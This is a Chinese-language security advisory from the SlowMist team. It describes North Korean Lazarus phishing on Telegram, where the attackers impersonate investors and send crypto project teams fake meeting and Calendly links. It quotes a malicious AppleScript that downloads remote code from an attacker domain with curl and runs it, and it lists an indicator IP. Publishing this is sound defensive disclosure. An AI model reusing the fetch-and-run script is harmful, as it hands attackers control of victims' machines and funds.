
慢霧:朝鮮黑客 Telegram 定點欺詐攻擊分析
TechFlow Selected深潮精選

慢霧:朝鮮黑客 Telegram 定點欺詐攻擊分析
朝鮮黑客開始冒充知名投資機構,對項目方進行欺詐釣魚,影響範圍較大。
撰文: 23pds@慢霧安全團隊
背景
早在 2022 年,慢霧安全團隊就通過慢霧 BTI 情報網絡發現朝鮮黑客 Lazarus 團伙開啟針對加密貨幣行業的大規模 Telegram 欺詐釣魚行動,近期朝鮮黑客更是開始冒充知名投資機構,對項目方進行欺詐釣魚,鑑於影響範圍較大,慢霧在此進行分析。

技戰法
一、挑選知名投資機構作為冒充對象,然後建立虛假的 Telegram 帳號:

二、尋找知名的 DeFi 項目方作為目標,以要投資他們為名,使用虛假帳號開始實施騙局:

朝鮮黑客會先對目標發起聊天以建立聯繫,如果項目方看到消息且安全意識不足,就會出現下圖的一幕:


朝鮮黑客騙取項目方的信任後便開始約會議,此處有兩種攻擊手法:
1. 邀請項目方加入如 ***.group-meeting.team 之類的會議,假裝詢問對方是否有時間安排會面或詳談,並主動提供惡意會議鏈接。項目方點擊鏈接後會看到地區訪問限制,這時朝鮮黑客會接著誘使項目方下載並運行其提供的“修改定位”的惡意腳本。一旦項目方照做,那麼他的電腦就會被朝鮮黑客控制,導致資金被盜取。下面是惡意腳本 IP_Request.scpt 的內容:
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k""& fix_url &"\""
run script sc
代碼解釋:

2. 利用 Calendly 會議預定系統的「添加自定義鏈接」在事件頁面的功能,在事件上插入惡意鏈接發起釣魚攻擊。由於 Calendly 與大多數項目方的日常工作背景很好地融合在一起,因此這些惡意鏈接不容易引起懷疑,項目方容易無意中點擊惡意鏈接,下載並執行惡意代碼,此時朝鮮黑客同樣可以獲取到項目方系統相關信息或權限。

慢霧安全團隊在 2023 年 11 月 30 日 也對相關攻擊手法做過提醒:

基礎 IOC:
IP: 104.168.137.21
Domains:

惡意攻擊樣例:


總結
鑑於此類詐騙行為仍在持續發生,建議 Web3 用戶務必確保在添加好友時通過雙重渠道確認對方的真實性,同時對 Telegram 開啟雙重身份驗證(2FA),隨時注意交易安全,以免遭受資金損失。
一旦不慎運行相關木馬,請第一時間轉移相關資金、斷網殺毒,同時修改目標電腦上(包括瀏覽器裡記錄的)相關賬號密碼等信息。
歡迎加入深潮 TechFlow 官方社群
Telegram 訂閱群:https://t.me/TechFlowDaily
Twitter 官方帳號:https://x.com/TechFlowPost
Twitter 英文帳號:https://x.com/BlockFlow_News














